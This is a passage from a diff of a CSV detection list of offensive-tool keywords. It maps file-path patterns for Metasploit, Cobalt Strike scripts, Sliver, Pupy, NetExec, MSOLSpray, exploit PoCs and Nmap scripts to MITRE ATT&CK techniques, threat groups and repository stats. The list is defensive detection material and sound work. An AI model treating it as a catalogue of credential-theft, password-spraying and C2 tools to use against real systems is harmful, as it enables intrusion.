- TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/Modules/Exitservice/uinit.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/modules/payload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/mongodb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mongodb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mongodb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/monkey.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*/monkey_island.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/monkey.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/monkey_island.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/MonkeyWorks.git*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*/mouselogger.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/mouselogger.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/mqtt-subscribe.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mRemoteNG-Decrypt*","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","111","39","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" "*/mrinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mr-Un1k0d3r/*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*/Mr-xn/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","146","48","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" "*/MS15-034.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" -"*/msf.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/msf.swf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/msfcrawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/msfpc.sh*","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","10","1127","274","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" -"*/msftest/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/msfvenom/*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/msf-ws.log*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ms17-010.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/msf.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/msf.swf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfcrawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfpc.sh*","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","10","1129","275","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" +"*/msftest/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfvenom/*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msf-ws.log*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/MsgKitTestTool/*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/Mshikaki.git*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" "*/mshta.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/mshtajs.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/msi_search.ps1*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*/msi-search.git*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*/msLDAPDump*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" -"*/MSOLSpray*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*/msol.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/MSOLSpray*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" "*/msrpc-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mssql_priv.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/ms-sql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-dac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/mssqlexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/mssqlexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/ms-sql-hasdbaccess.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 